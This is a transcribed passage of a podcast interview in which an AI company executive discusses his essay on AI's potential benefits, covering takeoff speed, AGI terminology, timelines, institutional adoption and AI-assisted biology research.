01:58:01.860 | that, uh, that, that, that I, that, that I think we should all want the field to
01:58:05.340 | have, let's talk about the incredible essay machines of love and grace.
01:58:09.860 | I recommend everybody read it.
01:58:11.140 | It's a long one.
01:58:12.220 | It is rather long.
01:58:13.420 | Yeah.
01:58:13.780 | It's really refreshing to read concrete ideas about what a
01:58:17.180 | positive future looks like.
01:58:18.980 | And you took sort of a bold stance because like, it's very possible that you might
01:58:22.460 | be wrong on the dates or specific.
01:58:24.420 | Oh yeah.
01:58:25.100 | I'm fully expecting to, you know, to de will definitely
01:58:28.100 | be wrong about all the details.
01:58:29.460 | I might be, be just spectacularly wrong about the whole thing.
01:58:33.340 | And people will, you know, will laugh at me for years.
01:58:35.580 | Um, uh, that's, that's how that's, that's just how the future works.
01:58:38.980 | So you provided a bunch of concrete, positive impacts of AI and how.
01:58:44.140 | You know, exactly a super intelligent AI might accelerate the rate of
01:58:47.660 | breakthroughs in, for example, biology and chemistry that would then lead to
01:58:52.460 | things like we cure most cancers, prevent all infectious disease, double
01:58:57.940 | the human lifespan and so on.
01:58:59.940 | So let's talk about this essay first.
01:59:02.060 | Can you give a high level vision of this essay and, um, what key
01:59:07.700 | takeaways that people should have?
01:59:08.820 | Yeah, I have spent a lot of time in Anthropic.
01:59:11.340 | I spent a lot of effort on like, you know, how do we address the risks of AI?
01:59:15.300 | Right.
01:59:15.500 | How do we think about those risks?
01:59:16.940 | Like we're trying to do a race to the top.
01:59:19.180 | You know, what that requires us to build all these capabilities
01:59:21.860 | and the capabilities are cool.
01:59:23.180 | But, you know, you know, we're, we're, we're like a big part of what we're
01:59:27.940 | trying to do is like, is like address the risks and the justification for
01:59:31.660 | that is like, well, you know, all these positive things, you know, the market
01:59:36.260 | is this very healthy organism, right?
01:59:37.860 | It's going to produce all the positive things, the risks.
01:59:40.460 | I don't know.
01:59:41.100 | We might mitigate them.
01:59:41.940 | We might not.
01:59:42.540 | And so we can have more impact by trying to mitigate the risks.
01:59:45.980 | But I noticed that one flaw in that way of thinking, and it's, it's not a
01:59:51.500 | change in how seriously I take the risks.
01:59:53.580 | It's, it's maybe a change in how I talk about them.
01:59:56.340 | Is that, you know, no matter how kind of logical or rational that line of
02:00:04.540 | reasoning that I just gave might be, if, if you kind of only talk about risks,
02:00:10.340 | your brain only thinks about risks.
02:00:12.060 | And, and so I think it's actually very important to understand what
02:00:15.420 | if things do go well and the whole reason we're trying to prevent these
02:00:18.300 | risks is not because we're afraid of technology, not because we want to slow
02:00:21.460 | it down, it's, it's, it's because if we can get to the other side of these
02:00:27.700 | risks, right, if we can run the gauntlet successfully to, you know, to, to put it
02:00:32.060 | in stark terms, then, then on the other side of the gauntlet are all these great
02:00:35.820 | things and these things are worth fighting for and these things can really inspire
02:00:39.740 | people and I think I imagine because look, you have all these investors, all
02:00:45.140 | these VCs, all these AI companies talking about all the positive benefits of AI.
02:00:49.780 | But as you point out, it's, it's, it's weird.
02:00:52.740 | There's actually a dearth of really getting specific about it.
02:00:55.820 | There's a lot of like random people on Twitter, like posting these kind of like
02:01:00.820 | gleaming cities and this, this just kind of like vibe of like grind, accelerate
02:01:05.780 | harder, like kick out the D cell.
02:01:07.900 | You know, it's, it's just this very, this very like aggressive ideological, but
02:01:12.380 | then you're like, well, what are you, what, what, what, what, what, what are
02:01:15.500 | you actually excited about?
02:01:16.740 | And so, and so I figured that, you know, I think it would be interesting and
02:01:21.380 | valuable for someone who's actually coming from the risk side to, to try and,
02:01:26.220 | and to try and really make a try at, at explaining, explaining, explain what the
02:01:33.460 | benefits are both because I think it's something we can all get behind and I
02:01:38.780 | want people to understand, I want them to really understand that this isn't, this
02:01:43.180 | isn't doomers versus accelerationists.
02:01:45.620 | Um, this, this is that if you have a true understanding of, of where things are
02:01:52.220 | going with, with AI, and maybe that's the more important axis, AI is moving fast
02:01:56.420 | versus AI is not moving fast, then you really appreciate the benefits and you,
02:02:00.860 | you, you, you really, you want humanity, our civilization to seize those benefits,
02:02:06.060 | but you also get very serious about anything that could derail them.
02:02:08.860 | So I think the starting point is to talk about what this powerful AI,
02:02:13.220 | which is the term you like to use, uh, most of the world uses AGI, but you
02:02:17.300 | don't like the term because it's, uh, basically has too much baggage.
02:02:21.980 | It's become meaningless.
02:02:23.100 | It's like, we're stuck with the terms.
02:02:25.020 | Maybe we're stuck with the terms and my efforts to change them are futile.
02:02:29.060 | I'll tell you what else.
02:02:30.460 | I don't, this is like a pointless semantic point, but I, I, I keep
02:02:34.460 | talking about it, so I'm just, I'm just gonna do it once more.
02:02:37.100 | Um, uh, I, I think it's, it's a little like, like, let's say it was like
02:02:41.780 | 1995 and Moore's law is making the computers faster and like, for some
02:02:46.180 | reason there, there, there, there had been this like verbal tick that like,
02:02:49.540 | everyone was like, well, someday we're going to have like supercomputers and
02:02:52.900 | like supercomputers are going to be able to do all these things that like, you
02:02:55.820 | know, once we have supercomputers, we'll be able to like sequence the genome.
02:02:59.060 | We'll be able to do other things.
02:03:00.260 | And so, and so like one, it's true.
02:03:02.020 | The computers are getting faster and as they get faster, they're
02:03:04.220 | going to be able to do all these great things.
02:03:05.820 | But there's like, there's no discrete point at which you had a supercomputer
02:03:10.260 | in previous computers were not to like supercomputers, a term we use, but
02:03:13.420 | like, it's a vague term to just describe like computers that are
02:03:17.260 | faster than what we have today.
02:03:18.700 | Um, there's no point at which you pass a threshold and you're like, Oh my God,
02:03:22.060 | we're doing a totally new type of computation and new.
02:03:24.820 | And, and so I feel that way about AGI.
02:03:26.620 | Like there's just a smooth exponential.
02:03:28.860 | And like, if, if by AGI, you mean like, like AI is getting better and
02:03:33.580 | better and like gradually it's going to do more and more of what humans do until
02:03:37.180 | it's going to be smarter than humans.
02:03:38.500 | And then it's going to get smarter even from there then, then yes, I believe in AGI.
02:03:42.260 | If, but if, if, if AGI is some discrete or separate thing, which is the way people
02:03:46.820 | often talk about it, then it's, it's kind of a meaningless buzzword.
02:03:49.300 | Yeah.
02:03:49.780 | I mean, to me, it's just sort of a platonic form of a powerful AI, exactly how you define it.
02:03:55.500 | I mean, you define it very nicely.
02:03:56.780 | So on the intelligence axis, it's just on pure intelligence.
02:04:02.540 | It's smarter than a Nobel prize winner, as you describe across most relevant disciplines.
02:04:07.260 | So, okay.
02:04:07.900 | That's just intelligence.
02:04:08.860 | So it's both in creativity and be able to generate new ideas, all that kind of stuff.
02:04:14.340 | In every discipline, Nobel prize winner.
02:04:16.540 | Okay.
02:04:17.460 | In their prime, it can use every modality.
02:04:22.180 | So this kind of self-explanatory, but just operate across all the modalities of the world.
02:04:27.460 | It can go off for many hours, days, and weeks to do tasks and do its own sort of
02:04:34.460 | detailed planning and only ask you help when it's needed.
02:04:37.740 | It can use, this is actually kind of interesting.
02:04:41.020 | I think in the essay you said, I mean, again, it's a bet that it's not going to be
02:04:44.820 | embodied, but it can control embodied tools.
02:04:49.180 | So it can control tools, robots, laboratory equipment.
02:04:52.020 | The resource used to train it can then be repurposed to run millions of copies of it.
02:04:57.500 | And each of those copies would be independent.
02:04:59.740 | They can do their own independent work.
02:05:01.140 | So you can do the cloning of the intelligence.
02:05:03.100 | Yeah.
02:05:03.340 | Yeah.
02:05:03.540 | I mean, you, you might imagine from outside the field that like, there's
02:05:06.220 | only one of these, right?
02:05:07.180 | That like you made it, you've only made one.
02:05:08.700 | But the truth is that like the scale up is very quick.
02:05:11.900 | Like we, we do this today.
02:05:13.460 | We make a model and then we deploy thousands, maybe tens of thousands of
02:05:17.020 | instances of it, I think by the time.
02:05:19.500 | You know, certainly within two to three years, whether we have these super
02:05:22.620 | powerful AIs or not, clusters are going to get to the size where you'll be able
02:05:26.460 | to deploy millions of these and there'll be, you know, faster than humans.
02:05:30.220 | And so if your picture is, oh, we'll have one and it'll take a while to make them.
02:05:33.820 | My point there was no, actually you have millions of them right away.
02:05:37.340 | And in general, they can learn and act.
02:05:40.340 | Uh, 10 to a hundred times faster than humans.
02:05:44.300 | So that's a really nice definition of powerful AI.
02:05:47.100 | Okay.
02:05:47.420 | So that, but you also write that clearly such an entity would be capable of
02:05:51.900 | solving very difficult problems very fast, but it is not trivial to figure out how
02:05:55.940 | fast two extreme positions both seem false to me.
02:05:59.100 | So the singularity is on the one extreme and the opposite and the other extreme.
02:06:03.900 | Can you describe each of the extremes?
02:06:05.300 | Yeah.
02:06:05.740 | So, so yeah, let's, let's describe the extreme.
02:06:08.740 | So like one, one extreme would be, well, look, um, you know, uh, if we look at
02:06:15.860 | kind of evolutionary history, like there was this big acceleration where, you know,
02:06:19.420 | for hundreds of thousands of years, we just had like, you know, single celled
02:06:22.820 | organisms, and then we had mammals and then we had apes and then that quickly
02:06:26.020 | turned to humans, humans quickly built industrial civilization.
02:06:29.140 | And so this is going to keep speeding up.
02:06:31.100 | And there's no ceiling at the human level.
02:06:33.700 | Once models get much, much smarter than humans, they'll get really
02:06:37.260 | good at building the next models.
02:06:38.740 | And, you know, if you write down like a simple differential equation,
02:06:41.900 | like this is an exponential.
02:06:43.180 | And so what's, what's going to happen is that, uh, models will build faster
02:06:47.620 | models, models will build faster models.
02:06:49.340 | And those models will build, you know, nanobots that can like take over the
02:06:52.700 | world and produce much more energy than you could produce otherwise.
02:06:56.180 | And so if you just kind of like solve this abstract differential equation,
02:06:59.700 | then like five days after we, you know, we build the first AI that's more
02:07:03.980 | powerful than humans, then, then, uh, you know, like the world will be filled
02:07:07.780 | with these AIs and every possible technology that could be invented,
02:07:10.620 | like will be invented.
02:07:11.580 | Um, I'm caricaturing this a little bit.
02:07:13.780 | Um, uh, but I, you know, I think that's one extreme.
02:07:17.780 | And the reason that I think that's not the case is that one, I think they just
02:07:24.340 | neglect like the laws of physics.
02:07:26.260 | Like it's only possible to do things so fast in the physical world.
02:07:29.140 | Like some of those loops go through, you know, producing faster hardware.
02:07:32.900 | Um, uh, it takes a long time to produce faster hardware.
02:07:36.420 | Things take a long time.
02:07:38.220 | There's this issue of complexity.
02:07:40.060 | Like, I think no matter how smart you are, like, you know, people talk about,
02:07:44.620 | oh, we can make models of biological systems.
02:07:46.820 | It'll do everything.
02:07:47.460 | The biological systems.
02:07:48.460 | Look, I think computational modeling can do a lot.
02:07:50.820 | I did a lot of computational modeling when I worked in biology, but like just.
02:07:55.300 | There are a lot of things that you can't predict how they're, you
02:07:59.700 | know, they're, they're complex enough that like just iterating, just
02:08:03.500 | running the experiment is going to beat any modeling, no matter how smart
02:08:06.940 | the system doing the modeling is.
02:08:08.340 | Or even if it's not interacting with the physical world, just
02:08:10.740 | the modeling is going to be hard.
02:08:12.540 | Yeah.
02:08:12.860 | I think, well, the modeling is going to be hard and getting the model
02:08:15.620 | to, to, to, to match the physical world is going to be all right.
02:08:18.900 | So he does have to verify, but it's just, you know, you just look
02:08:23.380 | at even the simplest problems.
02:08:24.860 | Like I, you know, I think I talk about like, you know, the three body
02:08:27.620 | problem or simple chaotic prediction, like, you know, or, or like predicting
02:08:32.260 | the economy, it's really hard to predict the economy two years out.
02:08:35.660 | Like maybe the case is like, you know, normal, you know, humans
02:08:39.540 | can predict what's going to happen in the economy next quarter.
02:08:42.060 | Or they can't really do that.
02:08:43.420 | Maybe, maybe a AI system that's, you know, a zillion times smarter can
02:08:48.060 | only predict it out a year or something instead of, instead of, you know,
02:08:50.860 | you have these kinds of exponential increase in computer intelligence for
02:08:55.220 | linear increase in, in, in ability to predict same with, again, like, you
02:09:00.620 | know, biological molecules, molecules interacting, you don't know what's
02:09:05.060 | going to happen when you perturb a, when you perturb a complex system,
02:09:07.940 | you can find simple parts in it.
02:09:09.620 | If you're smarter, you're better at finding these simple parts.
02:09:12.420 | And then I think human institutions, human institutions
02:09:15.500 | are just, are, are really difficult.
02:09:18.060 | Like it's, you know, it's, it's been hard to get people, I won't give specific
02:09:23.460 | examples, but it's been hard to get people to adopt even the technologies
02:09:28.500 | that we've developed, even ones where the case for their efficacy is very, very
02:09:32.980 | strong you know, people have concerns.
02:09:37.620 | They think things are conspiracy theories.
02:09:39.340 | Like it's, it's just been, it's been very difficult.
02:09:42.140 | It's also been very difficult to get, you know, very simple things
02:09:46.740 | through the regulatory system.
02:09:48.060 | Right.
02:09:48.580 | I think, you know, and you know, I don't want to disparage anyone who,
02:09:52.380 | you know, you know, works in regulatory, regulatory systems of any technology.
02:09:57.020 | There are hard trade-offs they have to deal with.
02:09:58.660 | They have to save lives, but, but the system as a whole, I think
02:10:02.980 | makes some obvious trade-offs that are very far from maximizing human welfare.
02:10:08.900 | And so if we bring AI systems into this, you know, into these human systems,
02:10:17.420 | often the level of intelligence may just not be the limiting factor, right?
02:10:22.700 | It, it, it just may be that it takes a long time to do something.
02:10:25.620 | Now, if the AI system circumvented all governments, if it just said,
02:10:30.140 | I'm dictator of the world and I'm going to do whatever, some of these things
02:10:33.500 | that could do again, the things having to do with complexity, I still think a
02:10:36.580 | lot of things would take a while.
02:10:38.220 | I don't think it helps that the AI systems can produce a lot
02:10:41.220 | of energy or go to the moon.
02:10:42.780 | Like some people in comments responded to the essay saying the AI system can
02:10:47.100 | produce a lot of energy and smarter AI systems, that's missing the point.
02:10:51.140 | That kind of cycle doesn't solve the key problems that I'm talking about here.
02:10:55.460 | So I think, I think a bunch of people miss the point there, but even if it
02:10:59.380 | were completely unaligned and, you know, could get around all these human
02:11:02.780 | obstacles, it would have trouble.
02:11:04.140 | But again, if you want this to be an AI system that doesn't take over the
02:11:07.820 | world, that doesn't destroy humanity, then, then basically, you know, it's,
02:11:12.020 | it's, it's going to need to follow basic human laws, right?
02:11:15.140 | Well, you know, if, if we want to have an actually good world, like we're
02:11:18.900 | going to have to have an AI system that, that interacts with humans, not one
02:11:22.860 | that kind of creates its own legal system or disregards all the laws or all of that.
02:11:26.980 | So as inefficient as these processes are, you know, we're going to have to
02:11:31.820 | deal with them because there, there needs to be some popular and democratic
02:11:35.740 | legitimacy in how these systems are rolled out.
02:11:37.940 | We can't have a small group of people who are developing these systems say
02:11:41.660 | this is what's best for everyone.
02:11:42.940 | Right.
02:11:43.260 | I think it's wrong.
02:11:44.580 | And I think in practice it's not going to work anyway.
02:11:46.300 | So you put all those things together and, you know, we're not, we're not
02:11:50.380 | going to, we're not going to, you know, change the world and
02:11:53.220 | upload everyone in five minutes.
02:11:54.660 | Uh, it's, I, I, I just, I don't think, I, A, I don't think it's going to happen.
02:11:59.700 | And B to, you know, to the extent that it could happen, it's, it's not
02:12:04.540 | the way to lead to a good world.
02:12:05.820 | So that's on one side.
02:12:07.260 | On the other side, there's another set of perspectives, which I have actually
02:12:11.220 | in some ways, more sympathy for, which is look, we've seen big
02:12:15.140 | productivity increases before, right?
02:12:17.220 | You know, economists are familiar with studying the productivity increases
02:12:21.580 | that came from the computer revolution and internet revolution.
02:12:24.380 | And generally those productivity increases were underwhelming.
02:12:27.620 | They were less than you, than you might imagine.
02:12:30.100 | Um, there was a quote from Robert Solow.
02:12:32.340 | You see the computer revolution everywhere except the productivity statistics.
02:12:35.780 | So why is this the case?
02:12:37.580 | People point to the structure of firms, the structure of enterprises, how, um, uh,
02:12:45.020 | you know, how slow it's been to roll out our existing technology to very poor
02:12:49.260 | parts of the world, which I talk about in the essay, right?
02:12:51.780 | How do we get these technologies to the poorest parts of the world that are behind
02:12:56.340 | on cell phone technology, computers, medicine, let alone, you know, newfangled
02:13:01.940 | AI that hasn't been invented yet.
02:13:03.500 | Um, so you could have a perspective that's like, well, this is amazing
02:13:07.300 | technically, but it's all a nothing burger.
02:13:09.060 | Um, uh, you know, I think, um, Tyler Cowen, who, who wrote something in
02:13:13.740 | response to my essay has that perspective.
02:13:16.380 | I think he thinks the radical change will happen eventually, but he thinks
02:13:19.300 | it'll take 50 or a hundred years.
02:13:20.780 | And, and you could have even more static perspectives on the whole thing.
02:13:25.140 | I think there's some truth to it.
02:13:26.700 | I think the timescale is just, is just too long.
02:13:29.380 | Um, and, and I can see it.
02:13:31.180 | I can actually see both sides with today's AI.
02:13:34.660 | So, uh, you know, a lot of our customers are large enterprises who are
02:13:39.140 | used to doing things a certain way.
02:13:40.780 | Um, I've also seen it in talking to governments, right?
02:13:44.140 | Those are, those are prototypical, you know, institutions, entities
02:13:47.900 | that are slow to change.
02:13:49.060 | Uh, but the dynamic I see over and over again is yes, it takes
02:13:53.860 | a long time to move the ship.
02:13:56.220 | There's a lot of resistance and lack of understanding.
02:13:58.780 | But the thing that makes me feel that progress will in the end happen
02:14:02.420 | moderately fast, not incredibly fast, but moderately fast is that you talk to.
02:14:07.820 | What I find is I find over and over again, again, in large companies, even
02:14:12.820 | in governments, um, which have been actually surprisingly forward leaning.
02:14:16.500 | Uh, you find two things that move things forward.
02:14:21.180 | One, you find a small fraction of people within a company, within a government
02:14:26.660 | who really see the big picture, who see the whole scaling hypothesis, who
02:14:30.620 | understand where AI is going, or at least understand where it's going within their
02:14:34.100 | industry, and there are a few people like that within the current, within the current
02:14:37.620 | U S government who really see the whole picture and, and those people see that
02:14:42.180 | this is the most important thing in the world until they agitate for it.
02:14:44.900 | And the thing that they alone are not enough to succeed because there are a
02:14:48.620 | small set of people within a large organization, but as the technology
02:14:54.180 | starts to roll out, as it succeeds in some places, in the folks who are most
02:14:59.420 | willing to adopt it, the specter of competition gives them a wind at their
02:15:04.500 | backs because they can point within their large organization, they can say.
02:15:09.020 | Look, these other guys are doing this, right?
02:15:11.700 | You know, one bank can say, look, this new fangled hedge fund is doing this thing.
02:15:15.380 | They're going to eat our lunch in the U S we can say, we're afraid China's
02:15:18.860 | going to get there before, before we are.
02:15:21.700 | And that combination, the specter of competition, plus a few visionaries
02:15:26.060 | within these, you know, within these, the organizations that in many ways
02:15:30.300 | are, are sclerotic, you put those two things together and it
02:15:33.540 | actually makes something happen.
02:15:34.900 | I mean, it's interesting.
02:15:36.100 | It's a balanced fight between the two because inertia is very powerful, but,
02:15:40.060 | but, but eventually over enough time, the innovative approach breaks through.
02:15:46.740 | Um, and I've seen that happen.
02:15:49.620 | I've seen the arc of that over and over again.
02:15:52.100 | And it's like the, the barriers are there, the, the barriers to progress,
02:15:57.700 | the complexity, not knowing how to use the model, how to deploy them are there.
02:16:02.220 | And, and for a bit, it seems like they're going to last forever.
02:16:06.100 | Like change doesn't happen, but then eventually change happens
02:16:09.620 | and always comes from a few people.
02:16:11.380 | I felt the same way when I was an advocate of the scaling hypothesis
02:16:15.220 | within the AI field itself.
02:16:16.780 | And others didn't get it.
02:16:17.700 | It felt like no one would ever get it.
02:16:19.620 | It felt like, then it felt like we had a secret almost no one ever had.
02:16:23.900 | And then a couple of years later, everyone has the secret.
02:16:26.700 | And so I think that's how it's going to go with deployment to AI in the world.
02:16:30.540 | It's going to, the, the barriers are going to fall apart
02:16:33.780 | gradually and then all at once.
02:16:35.540 | And so I think this is going to be more, and this is just an instinct.
02:16:39.460 | I could, I could easily see how I'm wrong.
02:16:41.620 | I think it's going to be more like 10, five or 10 years.
02:16:44.900 | As I say in the essay, then it's going to be 50 or a hundred years.
02:16:47.980 | I also think it's going to be five or 10 years more than it's going to be, you
02:16:52.660 | know, five or 10 hours because I've just, I've just seen how human systems work.
02:16:58.780 | And I think a lot of these people who write down the differential equations,
02:17:01.980 | who say AI is going to make more powerful AI, who can't understand how it could
02:17:05.860 | possibly be the case that these things won't, won't change so fast.
02:17:09.140 | I think they don't understand these things.
02:17:11.500 | So what do you use the timeline to where we achieve AGI, AKA powerful
02:17:18.300 | AI, AKA super useful AI, I'm going to start calling it that.
02:17:23.820 | It's a debate.
02:17:24.460 | It's a debate about naming.
02:17:26.420 | You know, on pure intelligence, it can smarter than a Nobel prize
02:17:31.660 | winner in every relevant discipline and all the things we've said.
02:17:34.300 | Modality can go and do stuff on its own for days, weeks, and do biology
02:17:39.900 | experiments, uh, on its own in one, you know what, let's just stick to biology.
02:17:44.380 | Cause yeah, you, you sold me on the whole biology and health section.
02:17:47.940 | That's so exciting from, um, from just, I was getting giddy
02:17:52.900 | from a scientific perspective.
02:17:54.620 | It made me want to be a biologist.
02:17:55.820 | It's almost, it's so, no, no, this was the feeling I had when I was writing it,
02:18:00.140 | that it's, it's like, this would be such a beautiful future if we can, if we can
02:18:04.700 | just, if we can just make it happen.
02:18:06.780 | Right.
02:18:07.020 | If we can just get the, get the landmines out of the way and, and, and, and make it
02:18:10.860 | happen, there's, there's so much, there's so much beauty and, and, and, and, and
02:18:16.940 | elegance and moral force behind it.
02:18:18.940 | If, if we can, if we can just, and it's something we should all be able to agree
02:18:23.020 | on, right?
02:18:23.580 | Like as much as we fight about, about all these political questions, is this something
02:18:28.780 | that could actually bring us together?
02:18:30.220 | Um, but you were asking when, when, when, when, when do you think what's just so
02:18:34.700 | putting numbers on, so, you know, this, this is of course, the thing I've been
02:18:37.580 | grappling with for many years and I'm not, I'm not at all confident every time.
02:18:41.660 | If I say 2026 or 2027, there will be like a zillion, like people on Twitter who will
02:18:47.180 | be like, Hey, I CEO said 2026, 2020, and it'll be repeated for like the next two
02:18:51.980 | years that like, this is definitely when I think it's going to happen.
02:18:54.780 | Um, so whoever's exerting these clips, we'll, we'll, we'll, we'll, we'll crop out
02:19:00.300 | the thing I just said and, and, and only say the thing I'm about to say.
02:19:03.660 | Um, but I'll just say it anyway.
02:19:05.660 | Um, uh, so, uh, if you extrapolate the curves that we've had so far, right.
02:19:12.460 | If, if you say, well, I don't know, we're starting to get to like PhD level.
02:19:16.700 | And, and last year we were at, um, uh, undergraduate level in the year before we
02:19:21.820 | were at like the level of a high school student.
02:19:24.140 | Again, you can, you can quibble with what tasks and for what we're still missing
02:19:28.700 | modalities, but those are being added.
02:19:30.380 | Like computer use was added.
02:19:31.980 | Like image in was added.
02:19:33.260 | Like image generation has been added.
02:19:34.940 | If you just kind of like, and this is totally unscientific, but if you just kind
02:19:39.660 | of like eyeball the rate at which these capabilities are increasing, it does make
02:19:44.780 | you think that we'll get there by 2026 or 2027.
02:19:48.380 | Again, lots of things could derail it.
02:19:51.260 | We could run out of data.
02:19:52.460 | You know, we might not be able to scale clusters as much as we want.
02:19:56.700 | Like, you know, maybe Taiwan gets blown up or something and, you know, then we
02:20:00.380 | can't produce as many GPUs as we want.
02:20:02.380 | So there, there are all kinds of things that could, could derail the whole process.
02:20:07.100 | So I don't fully believe the straight line extrapolation, but if you believe
02:20:11.180 | the straight line extrapolation, you'll, you'll, we'll get there in 2026 or 2027.
02:20:16.300 | I think the most likely is that there are some mild delay relative to that.
02:20:20.300 | Um, I don't know what that delay is, but I think it could happen on schedule.
02:20:24.140 | I think there could be a mild delay.
02:20:25.660 | I think there are still worlds where it doesn't happen in, in a hundred years.
02:20:29.100 | Those were the number of those worlds is rapidly decreasing.
02:20:32.460 | We are rapidly running out of truly convincing brocklers, truly compelling
02:20:37.260 | reasons why this will not happen in the next few years.
02:20:39.660 | There were a lot more in 2020.
02:20:41.660 | Um, although my, my guess, my hunch at that time was that we'll make
02:20:45.340 | it through all those blockers.
02:20:46.380 | So sitting as someone who has seen most of the blockers cleared out of the way,
02:20:50.700 | I kind of suspect my hunch, my suspicion is that the rest of them will not block us.
02:20:55.340 | Uh, but.
02:20:56.060 | You know, look, look, look at the end of the day, like, I don't want to represent
02:21:00.300 | this as a scientific prediction.
02:21:02.140 | People call them scaling laws.
02:21:03.660 | That's a misnomer.
02:21:04.540 | Like Moore's law is, is, is a misnomer.
02:21:07.020 | Moore's law scaling laws.
02:21:08.300 | They're not laws of the universe.
02:21:09.740 | They're empirical regularities.
02:21:11.500 | I am going to bet in favor of them continuing, but I'm not certain of that.
02:21:15.340 | So you extensively described sort of the compressed 21st century, how AGI will help.
02:21:21.660 | Uh, set forth a chain of breakthroughs in biology and medicine that help us in all
02:21:28.620 | these kinds of ways that I mentioned.
02:21:29.980 | So how do you think, what are the early steps it might do?
02:21:33.180 | And by the way, I asked Claude good questions to ask you and Claude told me, uh, to ask,
02:21:39.900 | what do you think is a typical day for biologists working on AGI look like under in this future?
02:21:45.740 | Yeah.
02:21:46.220 | Yeah.
02:21:46.780 | Claude is curious.
02:21:47.660 | Let me, well, let me start with your first questions and then I'll, then I'll answer
02:21:50.460 | that called Claude wants to know what's in his future, right?
02:21:52.620 | Exactly.
02:21:53.120 | Who am I going to be working with?
02:21:55.500 | Exactly.
02:21:56.060 | Um, so I think one of the things I went hard on when I went hard on in the essay is let
02:22:01.900 | me go back to this idea of, because it's, it's really had, had an, you know, had an
02:22:06.060 | impact on me, this idea that within large organizations and systems, there end up being
02:22:11.980 | a few people or a few new ideas who kind of cause things to go in a different direction.
02:22:17.180 | They would have before who, who kind of a disproportionately affect the trajectory.
02:22:22.300 | There's a bunch of kind of the same thing going on, right?
02:22:24.860 | If you think about the health world, there's like, you know, trillions of dollars to pay
02:22:29.020 | out Medicare and, you know, other health insurance.
02:22:31.660 | And then the NIH is a hundred billion.
02:22:33.820 | And then if I think of like the, the few things that have really revolutionized anything,
02:22:37.740 | it could be encapsulated in a small, small fraction of that.
02:22:41.020 | And so when I think of like, where will AI have an impact?
02:22:43.980 | I'm like, can AI turn that small fraction into a much larger fraction and raise its
02:22:48.460 | quality?
02:22:49.180 | And within biology, my experience within biology is that the biggest problem of biology is
02:22:56.220 | that you can't see what's going on.
02:22:59.020 | You, you have very little ability to see what's going on and even less ability to change it,
02:23:04.300 | right?
02:23:04.620 | What you have is this, like, like from this, you have to infer that there's a bunch of
02:23:10.460 | cells that within each cell is, you know, three billion base pairs of DNA built according
02:23:17.820 | to a genetic code.
02:23:18.940 | And, you know, there are all these processes that are just going on without any ability
02:23:24.700 | of us as, you know, unaugmented humans to affect it.
02:23:28.540 | These cells are dividing most of the time that's healthy, but sometimes that process
02:23:33.180 | goes wrong and that's cancer.
02:23:35.580 | The cells are aging.
02:23:37.500 | Your skin may change color, develop wrinkles as you, as you age.
02:23:42.140 | And all of this is determined by these processes, all these proteins being produced, transported
02:23:47.180 | to various parts of the cells, binding to each other.
02:23:50.380 | And in our initial state about biology, we didn't even know that these cells existed.
02:23:55.020 | We had to invent microscopes to observe the cells.
02:23:57.900 | We had to, we had to invent more powerful microscopes to see, you know, below the level
02:24:03.740 | of the cell to the level of molecules.
02:24:05.820 | We had to invent x-ray crystallography to see the DNA.
02:24:09.100 | We had to invent gene sequencing to read the DNA.
02:24:12.380 | Now, you know, we had to invent protein folding technology to, you know, to predict how it
02:24:17.180 | would fold and how they bind and how these things bind to each other.
02:24:21.260 | You know, we had to, we had to invent various techniques for now we can edit the DNA as
02:24:27.020 | of, you know, with CRISPR as of the last 12 years.
02:24:29.980 | So the whole history of biology, a whole big part of the history is basically our ability
02:24:37.660 | to read and understand what's going on and our ability to reach in and selectively change
02:24:42.460 | things.
02:24:42.780 | And my view is that there's so much more we can still do there, right?
02:24:48.060 | You can do CRISPR, but you can do it for your whole body.
02:24:50.700 | Let's say I want to do it for one particular type of cell, and I want the rate of targeting
02:24:56.860 | the wrong cell to be very low.
02:24:58.780 | That's still a challenge.
02:24:59.820 | That's still things people are working on.
02:25:01.740 | That's what we might need for gene therapy for certain diseases.
02:25:04.700 | And so the reason I'm saying all of this, and it goes beyond, you know, beyond this
02:25:10.140 | to, you know, to gene sequencing, to new types of nanomaterials for observing what's going
02:25:15.340 | on inside cells for, you know, antibody drug conjugates.
02:25:19.420 | The reason I'm saying all this is that this could be a leverage point for the AI systems,
02:25:24.620 | right?
02:25:25.180 | That the number of such inventions, it's in the mid-double digits or something.
02:25:30.940 | You know, mid-double digits, maybe low triple digits over the history of biology.
02:25:35.100 | Let's say I have a million of these AIs.
02:25:37.020 | Like, you know, can they discover a thousand, you know, working together, can they discover
02:25:40.540 | thousands of these very quickly?
02:25:42.460 | And does that provide a huge lever?
02:25:45.020 | Instead of trying to leverage the, you know, $2 trillion a year we spend on, you know,
02:25:49.020 | Medicare or whatever, can we leverage the $1 billion a year that's, you know, that's
02:25:53.020 | spent to discover, but with much higher quality?
02:25:55.420 | And so what is it like, you know, being a scientist that works with an AI system?
02:26:02.620 | The way I think about it actually is, well, so I think in the early stages, the AIs are
02:26:10.380 | going to be like grad students.
02:26:12.060 | You're going to give them a project.
02:26:13.820 | You're going to say, you know, I'm the experienced biologist.
02:26:16.700 | I've set up the lab.
02:26:18.140 | The biology professor or even the grad students themselves will say, here's what you can do
02:26:25.500 | with an AI, you know, like AI system.
02:26:28.220 | I'd like to study this.
02:26:29.660 | And, you know, the AI system, it has all the tools.
02:26:31.740 | It can like look up all the literature to decide what to do.
02:26:35.100 | It can look at all the equipment.
02:26:36.380 | It can go to a website and say, hey, I'm going to go to, you know, Thermo Fisher or, you
02:26:40.300 | know, whatever the lab equipment company is, the dominant lab equipment company is today.
02:26:44.700 | And my time was Thermo Fisher.
02:26:48.140 | You know, I'm going to order this new equipment to do this.
02:26:51.100 | I'm going to run my experiments.
02:26:52.700 | I'm going to, you know, write up a report about my experiments.
02:26:55.980 | I'm going to, you know, inspect the images for contamination.
02:26:59.740 | I'm going to decide what the next experiment is.
02:27:02.220 | I'm going to like write some code and run a statistical analysis.
02:27:06.060 | All the things a grad student would do, there will be a computer with an AI that like the
02:27:10.140 | professor talks to every once in a while.
02:27:11.820 | And it says, this is what you're going to do today.
02:27:13.660 | The AI system comes to it with questions.
02:27:15.660 | When it's necessary to run the lab equipment, it may be limited in some ways.
02:27:19.900 | It may have to hire a human lab assistant to, you know, to do the experiment and explain
02:27:24.940 | how to do it.
02:27:25.660 | Or it could, you know, it could use advances in lab automation that are gradually being
02:27:29.980 | developed over, have been developed over the last decade or so and will continue to be,
02:27:35.980 | will continue to be developed.
02:27:37.260 | And so it'll look like there's a human professor and a thousand AI grad students.
02:27:41.660 | And, you know, if you, if you go to one of these Nobel prize winning biologists or so,
02:27:45.820 | you'll say, okay, well, you, you know, you had like 50 grad students, well, now you have
